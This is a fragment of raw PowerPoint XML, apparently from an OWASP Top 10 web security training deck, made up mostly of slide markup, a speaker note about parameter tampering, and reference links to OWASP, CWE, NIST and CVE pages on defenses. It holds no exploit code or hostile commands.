        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1140010" y="4967876"/>
        <a:ext cx="847227" cy="107961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875393-9CE0-40DD-A78A-34757A3496C9}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5/8/17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="656740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3</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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20312927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13</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49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6898470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15</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16</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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3618577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49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</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49E76A86-908E-419A-9621-E32D65ED795D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5318423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20</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21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4</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22</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23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5</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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1233767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7</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8</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9</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10</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Can we squeeze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> a mention of ‘parameter tampering’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>It would also be nice to mention query constraints as a defense but maybe that’s too esoteric.</a:t>
            </a:r>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11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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF0736}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="50000"/>
                <a:lumOff val="50000"/>
              </a:schemeClr>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="4800" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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3200" b="1" spc="-100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Enter Title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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF073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5" r:id="rId2"/>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hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#tab=Use_the_Java_Encoder_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/AntiSamy" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Data_Validation" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/79.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting#Server_XSS" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting#Client_XSS" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/c/c5/Unraveling_some_Mysteries_around_DOM-based_XSS.pdf" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ESAPI" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/AccessReferenceMap.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://static.javadoc.io/org.owasp.esapi/esapi/2.1.0.1/org/owasp/esapi/AccessController.html" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-123.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmarks/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Direct_Object_Reference" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Configuration" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Error_Handling" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/A10_2004_Insecure_Configuration_Management" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide13.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SSL-TLS" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide14.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="NULL" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="NULL" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/799.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ZAP" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlmap.org/" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Web_Application_Firewall" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Failure_to_Restrict_URL_Access" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Intrusion_Detection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Automated_Threats_to_Web_Applications" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide15.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFProtector_Project" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://caniuse.com/#feat=same-site-cookie-attribute" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://static.javadoc.io/org.owasp.esapi/esapi/2.0.1/org/owasp/esapi/HTTPUtilities.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_CSRF_(OWASP-SM-005)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/352.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cross-site_request_forgery" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.spring.io/spring-security/site/docs/current/reference/html/csrf.html" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.playframework.com/documentation/2.5.x/JavaCsrf" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.djangoproject.com/en/1.10/topics/security/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://angular.io/docs/ts/latest/guide/security.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.dotnetcurry.com/aspnet/1343/aspnet-core-csrf-antiforgery-token" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://scotthelme.co.uk/csrf-is-dead/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRF" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFTester" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/CSRFGuard" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide16.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-5638" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvd.nist.gov/home.cfm" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.darkreading.com/application-security/what-do-you-mean-my-security-tools-dont-work-on-apis!!/a/d-id/1321050" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.soapui.org/testing-dojo/world-of-api-testing/state-of-api-security.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/REST_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 